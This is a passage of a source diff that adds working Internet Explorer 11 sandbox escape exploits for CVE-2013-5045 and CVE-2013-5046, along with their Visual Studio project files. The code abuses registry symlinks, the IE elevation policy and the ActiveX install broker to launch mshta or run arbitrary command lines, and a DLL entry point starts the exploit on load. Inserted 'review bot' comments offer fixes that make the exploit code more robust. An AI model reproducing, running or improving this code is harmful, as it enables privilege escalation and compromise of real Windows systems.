CloseHandle(procInfo.hThread); + + return procInfo.hProcess; + } +} + +bstr_t GetExploitUrl(LPWSTR env) +{ + WCHAR buf[MAX_ENV]; + + GetEnvironmentVariable(env, buf, MAX_ENV); + + return buf; +} + +void CreateIEProcess() +{ + HANDLE hProcess = MyCreateProcess(GetExecutableFileName(nullptr), L"iexplore.exe " + GetExploitUrl(L"HTML_URL")); + + if (hProcess) + { + WaitForSingleObject(hProcess, 1000); + CloseHandle(hProcess); + } +} + +void CreateUserKey(LPCWSTR path) +{ + STARTUPINFO startInfo = { 0 }; + PROCESS_INFORMATION procInfo = { 0 }; + bstr_t sid = GetUserSid(); + + bstr_t linkName = L"\\Registry\\User\\" + sid + 
L"\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain"; + + LONG res = RegDeleteKey(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain"); + + DebugPrintf("Delete: %d", res); + + bstr_t destName = L"\\Registry\\User\\" + sid + path; + + CreateLink(linkName, destName, 0); + + CreateIEProcess(); + + DeleteLink(linkName); +} + +void DoRegistrySymlink() +{ + STARTUPINFO startInfo = { 0 }; + PROCESS_INFORMATION procInfo = { 0 }; + HKEY hKey = nullptr; + HANDLE hSection = nullptr; + bstr_t sid = GetUserSid(); + bool success = false; + + try + { + CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights"); + CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy"); + CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}"); + + LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}", + 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey); + + if (res != 0) + { + DebugPrintf("Open Class Key Failed %d", res); + throw 0; + } + + CreateRegistryValueString(hKey, L"AppName", L"mshta.exe"); + CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory()); + CreateRegistryValueDword(hKey, L"Policy", 3); + + bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_"; + + UNICODE_STRING objName = { 0 }; + objName.Buffer = name; + objName.Length = SysStringByteLen(name); + objName.MaximumLength = SysStringByteLen(name); + + OBJECT_ATTRIBUTES objAttr = { 0 }; + + InitializeObjectAttributes(&objAttr, &objName, OBJ_CASE_INSENSITIVE, 0, 0); + + fNtOpenSection pfNtOpenSection = (fNtOpenSection)GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenSection"); + + NTSTATUS status = pfNtOpenSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE, &objAttr); + + if (status != 0) + { + 
DebugPrintf("Error opening section: %08X\n", status); + throw 0; + } + + unsigned int* p = (unsigned int*)MapViewOfFile(hSection, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, sizeof(unsigned int)); + + if (p == nullptr) + { + DebugPrintf("Error mapping section %d\n", GetLastError()); + throw 0; + } + + DebugPrintf("Current Counter: %d\n", *p); + + // Increment + *p = *p + 1; + + DebugPrintf("New Counter: %d\n", *p); + + UnmapViewOfFile(p); + CloseHandle(hSection); + hSection = nullptr; + + MyCreateProcess(GetWindowsSystemDirectory() + L"\\mshta.exe", L"mshta.exe " + GetExploitUrl(L"HTA_URL")); + } + catch (...) + { + } + + if (hSection) + { + CloseHandle(hSection); + } + + if (hKey) + { + RegCloseKey(hKey); + } + +} + +DWORD CALLBACK ExploitThread(LPVOID hModule) +{ + CoInitialize(nullptr); + DoRegistrySymlink(); + CoUninitialize(); + + FreeLibraryAndExitThread((HMODULE)hModule, 0); +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj new file mode 100755 index 0000000000..285b19b27e --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj 
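Review bot: `GetExploitUrl` in CVE-2013-5045.cpp returns `buf` without checking the result of `GetEnvironmentVariable`, so when the variable named by `env` is unset the `bstr_t` is built from an uninitialised 32767-element stack array. Zero-initialise the buffer and return early on failure, e.g. `WCHAR buf[MAX_ENV] = { 0 };` and `if (!GetEnvironmentVariable(env, buf, MAX_ENV)) return bstr_t();`. The `GetExploitUrl` in CVE-2014-0257.cpp follows the same pattern. Separately, `DoRegistrySymlink` leaves the `AppName`, `AppPath` and `Policy` values it writes under the `ElevationPolicy\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}` key in place and swallows every failure in an empty `catch (...)`. A header comment listing the registry state this file changes would tell whoever reverts or triages a test host what to look for.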
@@ -0,0 +1,188 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CVE20140268</RootNamespace> + <ProjectName>CVE-2013-5045</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + 
<WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + 
<FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <ModuleDefinitionFile> + </ModuleDefinitionFile> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="CVE-2013-5045.cpp" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged 
Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj"> + <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project> + </ProjectReference> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp new file mode 100755 index 0000000000..042cf2c7c4 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp 
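Review bot: The linker settings in CVE-2013-5045.vcxproj disagree between configurations: Debug|Win32, Debug|x64 and Release|x64 set `<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>`, while Release|Win32 leaves the element empty. The file name, together with `<RootNamespace>CVE20140268</RootNamespace>` and the `CVE20140268_EXPORTS` define, looks copied from the CVE-2014-0268 project. Whether a `.def` file of that name exists in this directory is not visible in this part of the patch; if it does not, those three configurations would presumably fail at link time. Either drop the element from all four configurations or point it at a definition file that belongs to this project. CVE-2013-5046.vcxproj carries the same `CVE20140268` namespace and macro leftovers, and both projects' stdafx.cpp comments still name `CVE-2014-0268.pch`.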
@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+ DWORD ul_reason_for_call,
+ LPVOID lpReserved
+ )
+{
+ switch (ul_reason_for_call)
+ {
+ case DLL_PROCESS_ATTACH:
+ CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+ break;
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp
new file mode 100755
index 0000000000..11763c77a3
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h
new file mode 100755
index 0000000000..562cb0adb0
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h
@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h
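Review bot: In CVE-2013-5045/dllmain.cpp the `DLL_PROCESS_ATTACH` case discards the handle returned by `CreateThread`, so the thread handle is leaked and a failed thread creation goes unnoticed. Keep the result and close it: `HANDLE hThread = CreateThread(nullptr, 0, ExploitThread, hModule, 0, nullptr);` followed by `if (hThread) CloseHandle(hThread);`. The last parameter is a pointer, so `nullptr` reads more clearly than `0` there. CVE-2013-5046/dllmain.cpp is the same blob (index 042cf2c7c4) and has the same issue.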
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp
new file mode 100755
index 0000000000..4a6fab2bff
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp
@@ -0,0 +1,127 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" +#include <Utils.h> +#include <Shlwapi.h> + +#pragma comment(lib, "shlwapi.lib") + +typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker); + +void DoAXExploit() +{ + try + { + HRESULT ret = E_FAIL; + + IIEUserBrokerPtr broker = CreateBroker(); + + DebugPrintf("Created User Broker: %p\n", broker); + + IIEAxInstallBrokerBrokerPtr axInstallBroker = broker; + + DebugPrintf("Created AX Install Broker: %p\n", axInstallBroker); + + IUnknownPtr unk; + + ret = axInstallBroker->BrokerGetAxInstallBroker(__uuidof(CIEAxInstallBroker), IID_IUnknown, 0, 2, nullptr, &unk); + if (FAILED(ret)) + { + DebugPrintf("Failed to create install broker\n"); + throw _com_error(ret); + } + + IIeAxiAdminInstallerPtr admin = unk; + + bstr_t sessionGuid; + bstr_t empty; + + ret = admin->InitializeAdminInstaller(empty, empty, sessionGuid.GetAddress()); + if (FAILED(ret)) + { + DebugPrintf("Failed initialize admin interface\n"); + throw _com_error(ret); + } + + DebugPrintf("Initialize: %ls\n", sessionGuid.GetBSTR()); + + IIeAxiInstaller2Ptr installer = unk; + + DebugPrintf("Installer: %p", installer); + + unsigned char* details = nullptr; + unsigned int detailsLength = 0; + + CLSID mgrclsid; + + // Not important really + 
CLSIDFromString(L"4871A87A-BFDD-4106-8153-FFDE2BAC2967", &mgrclsid); + + /*bstr_t url = L"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8"; + bstr_t path = L"C:\\users\\user\\desktop\\dlm-activex-2.2.4.8.cab";*/ + + bstr_t path = GetWindowsSystemDirectory() + L"\\notepad.exe"; + + bstr_t fullPath; + + // Verify a local "signed" file, doesn't really matter what, we are not going to run it + ret = installer->VerifyFile(sessionGuid, nullptr, path, path, bstr_t(L""), + 0, 0, mgrclsid, fullPath.GetAddress(), &detailsLength, &details); + + if (FAILED(ret)) + { + throw _com_error(ret); + } + + WCHAR newPath[MAX_PATH]; + + wcscpy_s(newPath, fullPath); + + PathRemoveFileSpec(newPath); + + // Install file to dummy location, use canonicalization trick to escape quotes later + ret = installer->InstallFile(sessionGuid, nullptr, bstr_t(newPath), bstr_t(PathFindFileName(fullPath)), + GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp", bstr_t(L"testbin.exe"), 0); + DebugPrintf("InstallFile: %08X\n", ret); + + if (FAILED(ret)) + { + throw _com_error(ret); + } + + bstr_t installPath = GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp\\testbin.exe"; + + PROCESS_INFORMATION procInfo = { 0 }; + + // Run our arbitrary command line + ret = installer->RegisterExeFile(sessionGuid, installPath, 0, &procInfo); + } + catch (_com_error e) + { + DebugPrintf("Error: %ls\n", e.ErrorMessage()); + } +} + +DWORD CALLBACK ExploitThread(LPVOID hModule) +{ + CoInitialize(NULL); + + DoAXExploit(); + + CoUninitialize(); + + FreeLibraryAndExitThread((HMODULE)hModule, 0); +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj new file mode 100755 index 0000000000..bde9556738 --- /dev/null 
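Review bot: In `DoAXExploit` (CVE-2013-5046.cpp) the result of the final `RegisterExeFile` call is stored in `ret` and then dropped, whereas every earlier broker call is followed by a `FAILED(ret)` check or a log line. Add at least `DebugPrintf("RegisterExeFile: %08X\n", ret);` so a run records whether that step succeeded. The handler should also catch by reference, `catch (const _com_error& e)`, instead of copying the exception object. The commented-out block with a download URL and a user-specific desktop path, and the unused `fCoCreateUserBroker` typedef, are dead code and can be removed.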
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj 
@@ -0,0 +1,182 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{7A9AC14A-00BC-4A69-9B86-C80635606FEA}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CVE20140268</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + 
<CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + 
</PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + 
